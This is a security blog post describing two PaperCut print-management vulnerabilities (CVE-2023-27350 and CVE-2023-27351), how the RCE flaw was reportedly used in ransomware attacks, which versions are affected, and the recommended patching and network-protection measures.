PaperCut Vulnerability Allows RCE, Exploited in the Wild

PaperCut Contains Two Critical Vulnerabilities
Two CVEs in PaperCut allow RCE and account data extraction

PaperCut, a software solution used for print management, appears to be vulnerable to remote code execution (RCE). Another security violation that popped out along with the former allows extracting user data from the profiles created in the program. The RCE vulnerability is already used in cyberattacks.

What is PaperCut?

PaperCut is a print management solution, which allows fine-tuning printer usage. It provides features such as print job tracking, print quota management, cost allocation, and secure printing, among others. The latter is exceptionally needed to prevent possible data leaks within the company. The software supports a wide range of different printers, scanners, and other devices of that purpose. It is a pretty popular solution – the latest data says about 100+ million users around the world. It can be very, very unfortunate if something that popular is unsafe.

Two Vulnerabilities Found in PaperCut Software

Recent research shows that PaperCut has two vulnerabilities – one is bad, and the other is horrifying. Let’s start with the most worrying one. CVE-2023-27350 allows remote code execution (RCE) without any authentication. RCE/ACE vulnerabilities are extremely dangerous, and seeing a 9+ CVSS rate for them is a common thing. This one received 9.8 points – equalling the recently-discovered MSMQ vulnerability.

Even more unpleasant is the fact that crooks already succeeded in using this vulnerability for cyberattacks. TrendMicro reported about hackers using the RCE vulnerability to execute a PowerShell script. The latter have downloaded a ransomware payload, circumnavigating passive security solutions present in the network. Threat actors did this trick using Windows Network Shell (netsh) utility. Another interesting feature of that attack is the use of temporary data hosting for payload delivery. In 60 minutes, the file is removed automatically from the hosting, leaving 0 evidence.

PaperCut RCE Vulnerability exploitation scheme

CVE-2023-27351 is less severe, yet still unpleasant. It also allows unauthorised access, but this time users’ information is under attack. Hackers can extract things like full names of the users, usernames, emails and even card numbers. All this information is available from user profiles created in PaperCut MF servers. It can potentially allow attackers to extract credentials to the PaperCut accounts.

List of PaperCut software vulnerable to mentioned exploits:

CVE-2023-27350 CVE-2023-27351
Site servers PaperCut MF/NG v.15.0 or later
Application servers Application servers
PaperCut MF/NG v.8.0 or later

How to Protect Against PaperCut Vulnerability?

Fortunately for all corporations that use the program, the developer already acknowledged that issue and released a security update. They recommend installing the latest updates available for vulnerable software as soon as possible. Such a rapid reaction is greatly appreciated, but companies generally tend to delay updates. This may be caused by numerous factors, some of which are hard to deal with. For that reason, preventive measures may be a more convenient option.

Most effective solution against exploitation is anti-malware software with a zero-trust policy. It supposes that no software is trusted, and each action must be checked. Modern EDR/XDR solutions generally opt for this exact policy, as it provides way higher protection rates against modern threats. Certainly, it has its downsides – but they are dim compared to the consequences of ransomware attack or APT activity.

Additional solution there is using active network protection. As I mentioned above, hackers used netsh to trick the firewall restrictions and reach the file hosting. More advanced network security solutions, like Network Detection and Response systems, are invulnerable to this. They will also make it much easier to analyse the cyberattacks (or their attempts), and implement urgent reactive measures.

By Stephanie Adlam

I write about how to make your Internet browsing comfortable and safe. The modern digital world is worth being a part of, and I want to show you how to do it properly.

Leave a comment

Your email address will not be published. Required fields are marked *